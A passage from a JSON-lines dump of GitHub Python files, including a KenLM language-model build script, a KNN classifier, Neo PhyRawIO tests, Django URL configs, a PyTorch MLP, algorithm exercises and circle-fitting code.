decorator\nfrom logtest import test_logger\nfrom logtest import _l\n\nmilli_time = (lambda x: int(round(x * 1000)))\n\n\ndef profiling(msg=None, records=None):\n def deco(func):\n def wrapper(func, *args, **kwargs):\n start = time.time()\n v = func(*args, **kwargs)\n end = time.time()\n\n test_obj = args[0]\n\n dict_float = {\n 'width': 10,\n 'prec': 3,\n }\n\n dict_info = {\n 'function_name': func.__name__,\n 'test_case': '{0}.{1}'.format(test_obj.__class__.__module__,\n test_obj.__class__.__name__),\n 'records': records,\n 'start': '{:{width}.{prec}f}'.format(start, **dict_float),\n 'end': '{:{width}.{prec}f}'.format(end, **dict_float),\n 'duration': '{:{width}.{prec}f}'.format(end - start,\n **dict_float),\n }\n if records is not None:\n _msg = '{function_name} - {records}: {duration} s'\n\n if msg is None:\n _msg = '{function_name} - {duration} s'\n else:\n _msg = msg\n\n test_logger.info(_l(_msg.format(**dict_info), **dict_info))\n\n return v\n\n return decorator.decorator(wrapper, func)\n\n return deco\n","repo_name":"arthuralvim/tutorial-sqlalchemy","sub_path":"tests/profiling.py","file_name":"profiling.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12196811745","text":"#! /usr/bin/env python3\nimport argparse, os, gzip, io, bz2, tarfile, logging, subprocess\nfrom collections import Counter\nimport progressbar\nfrom listener import tokenizer\n\nlog = logging.getLogger(__name__)\n\n\ndef ds_tokenizer(line):\n \"\"\"Default upstream tokenizer\"\"\"\n return line.lower().split()\n\n\ndef convert_and_filter_topk(\n input_txt,\n output_dir=None,\n top_k=50000,\n tokenizer=ds_tokenizer,\n stop_after=None,\n filter_function=None,\n context='default',\n):\n \"\"\" Convert to lowercase, count word occurrences and save top-k words to a file \"\"\"\n\n counter = Counter()\n if output_dir is None:\n output_dir = os.path.dirname(os.path.abspath(input_txt))\n\n data_lower = os.path.join(\n output_dir, \"%(context)s-lower.txt.gz\" % {'context': context,}\n )\n\n print(\"\\nConverting to lowercase and counting word occurrences ...\")\n lines = 0\n with io.TextIOWrapper(\n io.BufferedWriter(gzip.open(data_lower, \"w+\")), encoding=\"utf-8\"\n ) as file_out:\n\n # Open the input file either from input.txt or input.txt.gz\n rest, file_extension = os.path.splitext(input_txt)\n if rest.endswith('.tar'):\n file_in = tarfile.open(input_txt, mode='r:gz')\n\n def iter_tar_lines():\n for member in file_in:\n if not member.isfile():\n continue\n try:\n for line in io.TextIOWrapper(\n file_in.extractfile(member), encoding='utf-8',\n ):\n yield line\n except UnicodeDecodeError as err:\n log.warning(\"Encoding for %s is not utf-8\", member.name)\n continue\n\n line_iterator = iter_tar_lines()\n else:\n if file_extension == \".gz\":\n file_in = io.TextIOWrapper(\n io.BufferedReader(gzip.open(input_txt)), encoding=\"utf-8\"\n )\n elif file_extension == \".bz2\":\n file_in = io.TextIOWrapper(\n io.BufferedReader(bz2.open(input_txt)), encoding=\"utf-8\"\n )\n else:\n file_in = open(input_txt, encoding=\"utf-8\")\n line_iterator = file_in\n\n for line in progressbar.progressbar(line_iterator):\n if filter_function and not filter_function(line):\n continue\n tokens = tokenizer(line)\n if tokens:\n counter.update(tokens)\n file_out.write(' '.join(tokens).lower() + '\\n')\n lines += 1\n if stop_after and lines > stop_after:\n break\n elif not lines % 10000:\n print(line)\n print(' '.join(tokens))\n\n file_in.close()\n\n # Save top-k words\n print(\"\\nSaving top {} words ...\".format(top_k))\n top_counter = counter.most_common(top_k)\n vocab_str = \"\\n\".join(word for word, count in top_counter)\n vocab_path = \"{}-vocab-{}.txt\".format(context, top_k)\n vocab_path = os.path.join(output_dir, vocab_path)\n with open(vocab_path, \"w+\") as file:\n file.write(vocab_str)\n\n print(\"\\nCalculating word statistics ...\")\n total_words = sum(counter.values())\n print(\" Your text file has {} words in total\".format(total_words))\n print(\" It has {} unique words\".format(len(counter)))\n top_words_sum = sum(count for word, count in top_counter)\n word_fraction = (top_words_sum / total_words) * 100\n print(\n \" Your top-{} words are {:.4f} percent of all words\".format(\n top_k, word_fraction\n )\n )\n print(' Your most common word \"{}\" occurred {} times'.format(*top_counter[0]))\n last_word, last_count = top_counter[-1]\n print(\n ' The least common word in your top-k is \"{}\" with {} times'.format(\n last_word, last_count\n )\n )\n for i, (w, c) in enumerate(reversed(top_counter)):\n if c > last_count:\n print(\n ' The first word with {} occurrences is \"{}\" at place {}'.format(\n c, w, len(top_counter) - 1 - i\n )\n )\n break\n\n return data_lower, vocab_str\n\n\ndef wikipedia_filter(line):\n if line == '---END.OF.DOCUMENT---':\n return None\n elif not line.strip():\n return None\n tokens = line.lower().split()\n if len(tokens) < 4: # skip titles, empty lines, etc\n return None\n return line\n\n\ndef wikipedia():\n convert_and_filter_topk(\n '/var/datasets/text/WestburyLab.Wikipedia.Corpus.txt.bz2',\n tokenizer=create_dictation_tokenizer(),\n filter_function=wikipedia_filter,\n )\n\n\ndef upstream():\n convert_and_filter_topk(\n '/var/datasets/text/librispeech-lm-norm.txt.gz', tokenizer=ds_tokenizer,\n )\n\n\ndef raw_python_corpus():\n convert_and_filter_topk(\n '/var/datasets/text/python-corpus.tar.gz',\n tokenizer=create_dictation_tokenizer(code=True),\n filter_function=None,\n )\n\n\ndef create_dictation_tokenizer(code=False):\n \"\"\"Create a tokenizer for dictation inputs\"\"\"\n\n dictionary = tokenizer.default_dictionary()\n tokenizer = tokenizer.Tokenizer(dictionary, run_together_guessing=code)\n return tokenizer\n\n\ndef build_lm(args, data_lower, vocab_str):\n print(\"\\nCreating ARPA file ...\")\n lm_path = os.path.join(args.output_dir, \"lm.arpa\")\n subargs = [\n os.path.join(args.kenlm_bins, \"lmplz\"),\n \"--order\",\n str(args.arpa_order),\n \"--temp_prefix\",\n args.output_dir,\n \"--memory\",\n args.max_arpa_memory,\n \"--text\",\n data_lower,\n \"--arpa\",\n lm_path,\n \"--prune\",\n *args.arpa_prune.split(\"|\"),\n ]\n if args.discount_fallback:\n subargs += [\"--discount_fallback\"]\n subprocess.check_call(subargs)\n\n # Filter LM using vocabulary of top-k words\n print(\"\\nFiltering ARPA file using vocabulary of top-k words ...\")\n filtered_path = os.path.join(args.output_dir, \"lm_filtered.arpa\")\n subprocess.run(\n [\n os.path.join(args.kenlm_bins, \"filter\"),\n \"single\",\n \"model:{}\".format(lm_path),\n filtered_path,\n ],\n input=vocab_str.encode(\"utf-8\"),\n check=True,\n )\n\n # Quantize and produce trie binary.\n print(\"\\nBuilding lm.binary ...\")\n binary_path = os.path.join(args.output_dir, \"lm.binary\")\n subprocess.check_call(\n [\n os.path.join(args.kenlm_bins, \"build_binary\"),\n \"-a\",\n str(args.binary_a_bits),\n \"-q\",\n str(args.binary_q_bits),\n \"-v\",\n args.binary_type,\n filtered_path,\n binary_path,\n ]\n )\n\n\ndef main():\n from listener import defaults\n\n parser = argparse.ArgumentParser(\n description=\"Generate contextual language models for Listener\"\n )\n parser.add_argument(\n '-c',\n '--context',\n help=\"Which context to process\",\n choices=['code', 'wikipedia', 'upstream',],\n default='code',\n )\n\n parser.add_argument(\n \"--output_dir\",\n help=\"Directory path for the output\",\n type=str,\n required=True,\n default='/var/datasets/text',\n )\n parser.add_argument(\n \"--top_k\",\n help=\"Use top_k most frequent words for the vocab.txt file. These will be used to filter the ARPA file.\",\n type=int,\n required=True,\n )\n parser.add_argument(\n \"--kenlm_bins\",\n help=\"File path to the KENLM binaries lmplz, filter and build_binary\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--arpa_order\",\n help=\"Order of k-grams in ARPA-file generation\",\n type=int,\n required=True,\n )\n parser.add_argument(\n \"--max_arpa_memory\",\n help=\"Maximum allowed memory usage for ARPA-file generation\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--arpa_prune\",\n help=\"ARPA pruning parameters. Separate values with '|'\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--binary_a_bits\",\n help=\"Build binary quantization value a in bits\",\n type=int,\n required=True,\n )\n parser.add_argument(\n \"--binary_q_bits\",\n help=\"Build binary quantization value q in bits\",\n type=int,\n required=True,\n )\n parser.add_argument(\n \"--binary_type\",\n help=\"Build binary data structure type\",\n type=str,\n required=True,\n )\n parser.add_argument(\n \"--discount_fallback\",\n help=\"To try when such message is returned by kenlm: 'Could not calculate Kneser-Ney discounts [...] rerun with --discount_fallback'\",\n action=\"store_true\",\n )\n\n args = parser.parse_args()\n\n data_lower, vocab_str = convert_and_filter_topk(args)\n build_lm(args, data_lower, vocab_str)\n\n # Delete intermediate files\n # os.remove(os.path.join(args.output_dir, \"lower.txt.gz\"))\n # os.remove(os.path.join(args.output_dir, \"lm.arpa\"))\n # os.remove(os.path.join(args.output_dir, \"lm_filtered.arpa\"))\n","repo_name":"mcfletch/listener2_lm","sub_path":"listener2_lm/ds_genlm.py","file_name":"ds_genlm.py","file_ext":"py","file_size_in_byte":9245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16891095840","text":"'''$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\r\n K-Nearest Neighbors\r\n Auther:-Dhairy Kataria\r\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$'''\r\n#Importing the Libraries\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\n\r\n#Load Data From CSV File\r\ndf = pd.read_csv('teleCust1000t.csv')\r\ndf.info() #Seeing if there is any null value present\r\n\r\nsns.countplot(df['custcat']) #VLet’s see how many of each class is in our data set\r\n\r\n\r\nsns.countplot(x='custcat',hue='retire',data=df)\r\n\r\ndf.drop(['retire', 'gender'], axis=1)\r\n#setting the independent and dependent variable\r\nX = df.iloc[ : , 0:9].values\r\ny = df['custcat'].values\r\n\r\n\r\n#Data Standardization give data zero mean and unit variance, it is good practice, \r\n#especially for algorithms such as KNN which is based on distance of cases:\r\nfrom sklearn import preprocessing\r\nX = preprocessing.StandardScaler().fit(X).transform(X.astype(float))\r\n\r\n#Splitting data into Training set and Test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state = 1)\r\n\r\n#finding the best value of k for which the accuracy is maximum \r\nfrom sklearn.metrics import accuracy_score\r\nma = 0\r\n\r\nfor k in range (1,15):\r\n from sklearn.neighbors import KNeighborsClassifier\r\n neigh = KNeighborsClassifier( algorithm='auto', p=2, n_neighbors=k).fit(X_train, y_train)\r\n y_pred = neigh.predict(X_test)\r\n accuracy = accuracy_score(y_test, y_pred)\r\n \r\n if(accuracy > ma):\r\n ma = accuracy\r\n\r\nprint(ma)","repo_name":"dhairyakataria/MachineLeaning-KNearestNeighbour","sub_path":"telecom_customer(KNN).py","file_name":"telecom_customer(KNN).py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8682523181","text":"class Solution:\r\n def minimumBuckets(self,N, arr):\r\n gcd = arr[0]\r\n sum = arr[0]\r\n for i in range(1, N):\r\n gcd = self.computeGCD(gcd, arr[i])\r\n sum += arr[i]\r\n return int(sum / gcd)\r\n\r\n def computeGCD(self, x, y):\r\n while y:\r\n x, y = y, x % y\r\n return abs(x)\r\n\r\n\r\nclass IntArray:\r\n def __init__(self):\r\n pass\r\n def Input(self):\r\n arr = [int(i) for i in input().strip().split()]\r\n return arr\r\n def Print(self,arr):\r\n for i in arr:\r\n print(i,end=\" \")\r\n print()\r\n\r\nif __name__ == \"__main__\":\r\n t = int(input())\r\n for i in range(t):\r\n N = int(input())\r\n arr = IntArray().Input()\r\n obj = Solution()\r\n res = obj.minimumBuckets(N,arr)\r\n print(res)\r\n\r\n\r\n\r\n\r\n","repo_name":"santha22/PythonPrograms","sub_path":"GFG/GeekssPlant.py","file_name":"GeekssPlant.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27220542449","text":"# 문제: 1과 0으로 이루어진 array에서 1과 0의 갯수가 같은 subarray의 최대길이는 몇 인가?\n\n# two pointers 로 풀기 어려운 이유는 어떤 조건에 포인터를 움직여줘야 하는지 정하기 어려움\n# 이전 문제와 마찬가지로 누적합과 해쉬테이블을 이용, \n# 시간복잡도 O(n) 공간복잡도 O(n)\n\n# 포인트는 1, 0인 애들이 입력값으로 들어오기에, 0을 -1로 치환해서 누적을 이용하는것, 갯수가 같으면 전체 합이 0이 됨\n# 입력값이 알파벳이라도 치환할 수 있음\n\n# 포인트는 누적값의 부분배열의 합은, 누적값에서 구하고자하는 부분배열 이전까지의 누적값을 빼주면 된다는 것.\n\n\nfrom typing import List\n\ndef findMaxLength(nums: List[int]) -> int:\n \n for idx in range(len(nums)):\n if nums[idx] == 0 :\n nums[idx] = -1\n \n cml_sums = []\n tmp_sum = 0\n for num in nums:\n tmp_sum += num\n cml_sums.append(tmp_sum)\n \n table = {}\n max_length = 0\n table[0] = [-1]\n \n for idx, cml_sum in enumerate(cml_sums):\n if cml_sum not in table:\n table[cml_sum] = [idx]\n else:\n table[cml_sum].append(idx)\n \n indices = table[cml_sum]\n first_idx = indices[0]\n last_idx = indices[-1]\n length = last_idx - first_idx\n max_length = max(max_length,length)\n \n return max_length\n\nfindMaxLength(nums=[1,0,1,1,1,0,0,1,1])\n\n\n##################################################\n\n\ndef contigArray(nums: List[int]) -> int:\n \n for idx, num in enumerate(nums):\n if num == 0:\n nums[idx] = -1\n\n accumNums = []\n tempNum = 0\n for num in nums:\n tempNum += num\n accumNums.append(tempNum)\n\n maxLength = 0\n hashTable = {}\n hashTable[0] = [-1] # 배열의 0번째에서부터 n번째가 해당하는 부분 배열이라면 이 배열의 길이를 구하기 위해 배열의 -1번째 값을 0으로 둔다는 뜻으로, 해시테이블에 입력\n # 포인트는 누적값의 부분배열의 합은, 누적값에서 구하고자하는 부분배열 이전까지의 누적값(target)을 빼주면 된다는 것. 따라서 여기서는 누적값의 부분배열의 합이 0인 부분배열을 구하는 것\n # accNum - target = sum\n for idx, accumNum in enumerate(accumNums): # 해시테이블에는 같은 누적수의 인덱스들이 오름차순 배열로 들어가게 됨. target = accNum - sum, sum = 0 이기 때문에, target = accNum, 누적값이 target이라 다음 누적값을 찾으면됨\n if accumNum not in hashTable:\n hashTable[accumNum] = [idx] # 해쉬테이블에 누적값이 같은 인덱스들만 배열로 저장\n else:\n hashTable[accumNum].append(idx) # target = accNum - sum, sum = 0 이기 때문에, target = accNum, 누적값이 target이라 다음 누적값을 찾으면됨\n\n startIdx = hashTable[accumNum][0] \n endIdx = hashTable[accumNum][-1]\n lenth = endIdx - startIdx # 0~startIdx까지 누적값 == 0~endIdx 누적값 같으므로, 0~endIdx 누적값에서 0~startIdx까지 누적값을빼면 startIdx+1 ~ endIdx 합이 0이라는 뜻, 그 0이되는 부분배열의 길이가 두 인덱스의 차, 구하고자하는 부분배열 이전까지의 누적값(target)을 빼주면 된다는 것, \n maxLength = max(maxLength, lenth) # 최대길이를 구하는 문제이므로 그 길이를 맥스함수로. 다만 반복문을 수행할수록 그 길이는 업데이트 될 것임.\n\n return maxLength\n\n","repo_name":"badoil/algorithms","sub_path":"algo5.hash/hash5.contiguousArray.py","file_name":"hash5.contiguousArray.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37727206382","text":"\"\"\"\nTests of neo.rawio.phyrawio\n\nAuthor: Regimantas Jurkus\n\n\"\"\"\n\nimport unittest\n\nfrom neo.rawio.phyrawio import PhyRawIO\n\nfrom neo.test.rawiotest.common_rawio_test import BaseTestRawIO\n\nimport csv\nimport tempfile\nfrom pathlib import Path\nfrom collections import OrderedDict\nimport sys\n\n\nclass TestPhyRawIO(BaseTestRawIO, unittest.TestCase):\n rawioclass = PhyRawIO\n entities_to_download = [\n 'phy'\n ]\n entities_to_test = [\n 'phy/phy_example_0'\n ]\n\n def test_csv_tsv_parser_with_csv(self):\n csv_tempfile = Path(tempfile.gettempdir()).joinpath('test.csv')\n with open(csv_tempfile, 'w') as csv_file:\n csv_writer = csv.writer(csv_file, delimiter=',')\n csv_writer.writerow(['cluster_id', 'some_annotation', 'some_other_annotation'])\n csv_writer.writerow([1, 'Good', 'Bad'])\n csv_writer.writerow([2, 10, -2])\n csv_writer.writerow([3, 1.23, -0.38])\n\n # the parser in PhyRawIO runs csv.DictReader to parse the file\n # csv.DictReader for python version 3.6+ returns list of OrderedDict\n if (3, 6) <= sys.version_info < (3, 8):\n target = [OrderedDict({'cluster_id': 1,\n 'some_annotation': 'Good',\n 'some_other_annotation': 'Bad'}),\n OrderedDict({'cluster_id': 2,\n 'some_annotation': 10,\n 'some_other_annotation': -2}),\n OrderedDict({'cluster_id': 3,\n 'some_annotation': 1.23,\n 'some_other_annotation': -0.38})]\n\n # csv.DictReader for python version 3.8+ returns list of dict\n elif sys.version_info >= (3, 8):\n target = [{'cluster_id': 1,\n 'some_annotation': 'Good',\n 'some_other_annotation': 'Bad'},\n {'cluster_id': 2,\n 'some_annotation': 10,\n 'some_other_annotation': -2},\n {'cluster_id': 3,\n 'some_annotation': 1.23,\n 'some_other_annotation': -0.38}]\n\n list_of_dict = PhyRawIO._parse_tsv_or_csv_to_list_of_dict(csv_tempfile)\n\n self.assertEqual(target, list_of_dict)\n\n def test_csv_tsv_parser_with_tsv(self):\n tsv_tempfile = Path(tempfile.gettempdir()).joinpath('test.tsv')\n with open(tsv_tempfile, 'w') as tsv_file:\n tsv_writer = csv.writer(tsv_file, delimiter='\\t')\n tsv_writer.writerow(['cluster_id', 'some_annotation'])\n tsv_writer.writerow([1, 'Good'])\n tsv_writer.writerow([2, 10])\n tsv_writer.writerow([3, 1.23])\n\n # the parser in PhyRawIO runs csv.DictReader to parse the file\n # csv.DictReader for python version 3.6+ returns list of OrderedDict\n if (3, 6) <= sys.version_info < (3, 8):\n target = [OrderedDict({'cluster_id': 1,\n 'some_annotation': 'Good'}),\n OrderedDict({'cluster_id': 2,\n 'some_annotation': 10}),\n OrderedDict({'cluster_id': 3,\n 'some_annotation': 1.23})]\n\n # csv.DictReader for python version 3.8+ returns list of dict\n elif sys.version_info >= (3, 8):\n target = [{'cluster_id': 1, 'some_annotation': 'Good'},\n {'cluster_id': 2, 'some_annotation': 10},\n {'cluster_id': 3, 'some_annotation': 1.23}]\n\n list_of_dict = PhyRawIO._parse_tsv_or_csv_to_list_of_dict(tsv_tempfile)\n\n self.assertEqual(target, list_of_dict)\n\n def test_csv_tsv_parser_error_raising(self):\n txt_tempfile = Path(tempfile.gettempdir()).joinpath('test.txt')\n with open(txt_tempfile, 'w') as txt_file:\n txt_file.write('This is a test')\n\n self.assertRaises(ValueError,\n PhyRawIO._parse_tsv_or_csv_to_list_of_dict,\n txt_tempfile)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"NeuralEnsemble/python-neo","sub_path":"neo/test/rawiotest/test_phyrawio.py","file_name":"test_phyrawio.py","file_ext":"py","file_size_in_byte":4168,"program_lang":"python","lang":"en","doc_type":"code","stars":275,"dataset":"github-code","pt":"78"} +{"seq_id":"9931065032","text":"from django.urls import path\nfrom . import views \nfrom .views import UserQuestionsListView, QuestionUpdateView\n\nurlpatterns = [\n path('', views.home, name='library-home'),\n path('it_sems/', views.it_sems, name='library-it-sems'),\n path('cse_sems/', views.cse_sems, name='library-cse-sems'),\n path('ece_sems/', views.ece_sems, name='library-ece-sems'),\n path('eee_sems/', views.eee_sems, name='library-eee-sems'), \n path('it_sem1/', views.it_sem1, name='library-it-sem1'), \n path('it_sem2/', views.it_sem2, name='library-it-sem2'), \n path('it_sem3/', views.it_sem3, name='library-it-sem3'), \n path('it_sem4/', views.it_sem4, name='library-it-sem4'), \n path('it_sem5/', views.it_sem5, name='library-it-sem5'), \n path('it_sem6/', views.it_sem6, name='library-it-sem6'), \n path('it_sem7/', views.it_sem7, name='library-it-sem7'), \n path('cse_sem1/', views.cse_sem1, name='library-cse-sem1'), \n path('cse_sem2/', views.cse_sem2, name='library-cse-sem2'), \n path('cse_sem3/', views.cse_sem3, name='library-cse-sem3'), \n path('cse_sem4/', views.cse_sem4, name='library-cse-sem4'), \n path('cse_sem5/', views.cse_sem5, name='library-cse-sem5'), \n path('cse_sem6/', views.cse_sem6, name='library-cse-sem6'), \n path('cse_sem7/', views.cse_sem7, name='library-cse-sem7'), \n path('ece_sem1/', views.ece_sem1, name='library-ece-sem1'), \n path('ece_sem2/', views.ece_sem2, name='library-ece-sem2'), \n path('ece_sem3/', views.ece_sem3, name='library-ece-sem3'), \n path('ece_sem4/', views.ece_sem4, name='library-ece-sem4'), \n path('ece_sem5/', views.ece_sem5, name='library-ece-sem5'), \n path('ece_sem6/', views.ece_sem6, name='library-ece-sem6'), \n path('ece_sem7/', views.ece_sem7, name='library-ece-sem7'), \n path('it_sem3_DMA/',views.it_sem3_DMA, name='library-it-sem3-DMA'), \n path('subjectview_sem3/', views.subjectview_sem3 , name='subjectview_sem3'),\n path('subjectview_sem1/', views.subjectview_sem1 , name='subjectview_sem1'),\n path('subjectview_sem2/', views.subjectview_sem2 , name='subjectview_sem2'),\n path('subjectview_sem4/', views.subjectview_sem4 , name='subjectview_sem4'),\n path('subjectview_sem5/', views.subjectview_sem5 , name='subjectview_sem5'),\n path('subjectview_sem6/', views.subjectview_sem6 , name='subjectview_sem6'),\n path('subjectview_sem7/', views.subjectview_sem7 , name='subjectview_sem7'),\n path('subjectview_sem8/', views.subjectview_sem8 , name='subjectview_sem8'),\n path('stackoverflow-home/',views.stack_home,name='stackoverflow-home'),\n path('detail//',views.detail,name='stackoverflow-detail_page'),\n path('save-comment',views.save_comment,name='save-comment'),\n path('save-upvote',views.save_upvote,name='save-upvote'),\n path('save-downvote',views.save_downvote,name='save-downvote'),\n path('ask-question',views.ask_form,name='ask-question'),\n path('tag/',views.tag,name='tag'),\n path('profile/',views.profile,name='profile'),\n path('tags/',views.tags,name='tags'),\n path('user/', UserQuestionsListView.as_view(), name='user-qstns'),\n path('detail//update/', QuestionUpdateView.as_view() , name='qstn-update'),\n \n]\n","repo_name":"keerthi-aluvala/stackoverflow_cum_library","sub_path":"elibrary/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"45093505072","text":"import torch\nfrom sklearn.model_selection import train_test_split\nimport datetime\nimport numpy as np\nimport random as rd\nfrom ds import CourseDataset\n\nclass PerceptronMulticapaPT:\n def __init__(self):\n self.model=torch.nn.Sequential()\n self.model.append(torch.nn.Linear(3,32))\n self.model.append(torch.nn.Sigmoid())\n self.model.append(torch.nn.Linear(32,1))\n self.model.append(torch.nn.Sigmoid())\n self.criterio=torch.nn.BCELoss()\n self.optimizer=torch.optim.SGD(self.model.parameters(),lr=0.01)\n\n def train(self,x,y,xv,yv):\n self.model.train()\n epochs=128\n for epoch in range(epochs):\n self.optimizer.zero_grad()\n y_pred=self.model(x)\n loss=self.criterio(y_pred.squeeze(),y)\n print('Epoch {}: train loss: {}'.format(epoch, loss.item()))\n loss.backward()\n self.optimizer.step()\n\nX=[]\nY=[]\narchivo=open(\"dataset_ejemplo_40_3_16.csv\")\narchivo.readline()\nfor linea in archivo:\n linea=linea.strip().split(\";\")\n x=list(map(float,[linea[1],linea[2],linea[3]]))\n y=1 if linea[0]==\"R\" else 0\n X.append(x)\n Y.append(y)\narchivo.close()\nX=torch.FloatTensor(X)\nY=torch.FloatTensor(Y)\nseed=121208\nrd.seed(seed)\nnp.random.seed(seed)\ntorch.manual_seed(seed)\nmlp=PerceptronMulticapaPT()\nx_train, x_val, y_train, y_val = train_test_split(X, Y, test_size=0.3, stratify=Y, random_state=1)\nmlp.train(x_train,y_train,x_val,y_val)","repo_name":"pabloschwarzenberg/CINF104","sub_path":"mlp/mlp_p.py","file_name":"mlp_p.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"18741285782","text":"def isUniqueChar1(s):\n # using data structure: set\n str_set = set(s)\n if len(s) == len(str_set): # check the length\n return True\n return False\n\n\ndef isUniqueChar2(s):\n # simple comparison of each character\n for i in range(len(s) - 1):\n for j in range(i + 1, len(s)):\n if s[i] == s[j]:\n return False\n return True\n\n\ndef isUniqueChar3(s):\n # using python function count\n for letter in s:\n if s.count(letter) > 1:\n return False\n return True\n\n\ndef isUniqueCharUsingASCII(s):\n # using ASCII\n if len(s) > 256:\n return False\n\n letter_bool = [False] * 256\n for letter in s:\n # ord returns ASCII\n if letter_bool[ord(letter)] is True:\n return False\n else:\n letter_bool[ord(letter)] = True\n return True\n\n\nimport unittest\n\n\nclass noDupTestClass(unittest.TestCase):\n\n test_data = [('a', True),\n ('aa', False),\n ('ab', True),\n ('ab ', True),\n ('', True),\n (' ', True),\n (' ', False),\n ('qwerty', True),\n ('qwerte', False)\n ]\n\n def runTest(self):\n for s, ans in self.test_data:\n r1 = isUniqueChar1(s)\n self.assertEqual(r1, ans)\n\n r2 = isUniqueChar2(s)\n self.assertEqual(r2, ans)\n\n r3 = isUniqueChar3(s)\n self.assertEqual(r3, ans)\n\n r4 = isUniqueCharUsingASCII(s)\n self.assertEqual(r4, ans)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"SungGV/algorithmPractice","sub_path":"algorithms/cracking the code/1-1.py","file_name":"1-1.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9020631971","text":"'''Generating permutations for list of numbers.\n\n'''\ndef find_number(prefix, number):\n '''Find selected number in current prefix of permutations.\n If number is found, returns True, else False.\n\n Keyword arguments:\n prefix -- list of numbers (list)\n number -- number for checking (int)\n\n '''\n res = False\n for i in prefix:\n if i == number:\n res = True\n break\n return res\n\ndef generate_permutations(num_amount: int, pos_amount: int = -1, prefix = None):\n '''Generate all permutations for num_amount numbers in pos_amount\n positions with prefix.\n\n Keyword arguments:\n num_amount -- numbers from 1 to num_amount are the numbers for\n generating permutations (int)\n pos_amount -- amount of rest positions for generating permutations\n with current prefix (int)\n prefix -- generated part of permutation (list)\n\n '''\n # num_amount numbers in num_amount positions by default\n pos_amount = num_amount if pos_amount == -1 else pos_amount\n prefix = prefix or []\n if pos_amount == 0:\n print(*prefix)\n return\n for number in range(1, num_amount + 1):\n if find_number(prefix, number):\n continue\n prefix.append(number)\n generate_permutations(num_amount, pos_amount - 1, prefix)\n del prefix[-1]\n\ndef test_permutations():\n '''Common test for permutations.\n\n '''\n test_case_gen_numbers(3, \"1\")\n test_case_gen_numbers(4, \"2\")\n test_case_gen_numbers(5, \"3\")\n\ndef test_case_gen_numbers(num_base, case_name):\n '''Test case for generating numbers.\n\n '''\n print(\"testcase #\", case_name, sep = \": \")\n generate_permutations(num_base)\n\nif __name__ == '__main__':\n test_permutations()\n","repo_name":"avoevodin/lab2","sub_path":"recursion_generate_permutations.py","file_name":"recursion_generate_permutations.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42932937290","text":"#basic_app urls.py\nfrom django.conf.urls import url###\nfrom basic_app import views###\n\n\n# TEMPLATE URLS!\napp_name = 'basic_app'\n\n# Be careful setting the name to just /login use userlogin instead!\nurlpatterns=[\n url('register/', views.register, name ='register'),\n url('user_login/', views.user_login, name ='user_login'),\n #url('',views.index, name ='index'),\n]\n","repo_name":"joracornev/django_deployment_example","sub_path":"basic_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27946691805","text":"from numpy import *\nfrom scipy import optimize, odr\nimport functools\nfrom matplotlib import pyplot as plt, cm, colors\n\nplt.rcParams[\"font.sans-serif\"] = [\"SimHei\"] # 设置字体\nplt.rcParams[\"axes.unicode_minus\"] = False # 该语句解决图像中的“-”负号的乱码问题\n\n# 方法一 代数逼近法\nmethod_1 = '代数逼近法 '\n# 坐标\nx = r_[14, 15, 15, 16, 16, 17, 17, 18, 19, 20, 20, 21, 22, 23, 24, 25, 26, 26, 27, 28, 29, 30, 31, 32]\ny = r_[-261, -260, -261, -259, -260, -258, -259, -258, -257, -256, -257, -255, -254, -254, -253, -253, -252, -253, -252, -251, -251, -250, -250, -250]\n\nx_m = mean(x)\ny_m = mean(y)\n\nmethod_2 = \"最小二乘法 \"\n\n\n# 修饰器:用于输出反馈\ndef countcalls(fn):\n \"decorator function count function calls \"\n\n @functools.wraps(fn)\n def wrapped(*args):\n wrapped.ncalls += 1\n return fn(*args)\n\n wrapped.ncalls = 0\n return wrapped\n\n\ndef calc_R(xc, yc):\n \"\"\" 计算s数据点与圆心(xc, yc)的距离 \"\"\"\n return sqrt((x - xc) ** 2 + (y - yc) ** 2)\n\n\n@countcalls\ndef f_2(c):\n \"\"\" 计算半径残余\"\"\"\n Ri = calc_R(*c)\n return Ri - Ri.mean()\n\n\n# 圆心估计\ncenter_estimate = x_m, y_m\ncenter_2, _ = optimize.leastsq(f_2, center_estimate)\n\nxc_2, yc_2 = center_2\nRi_2 = calc_R(xc_2, yc_2)\n# 拟合圆的半径\nR_2 = Ri_2.mean()\nresidu_2 = sum((Ri_2 - R_2) ** 2)\nresidu2_2 = sum((Ri_2 ** 2 - R_2 ** 2) ** 2)\nncalls_2 = f_2.ncalls\n\nfmt = '%-22s %10.5f %10.5f 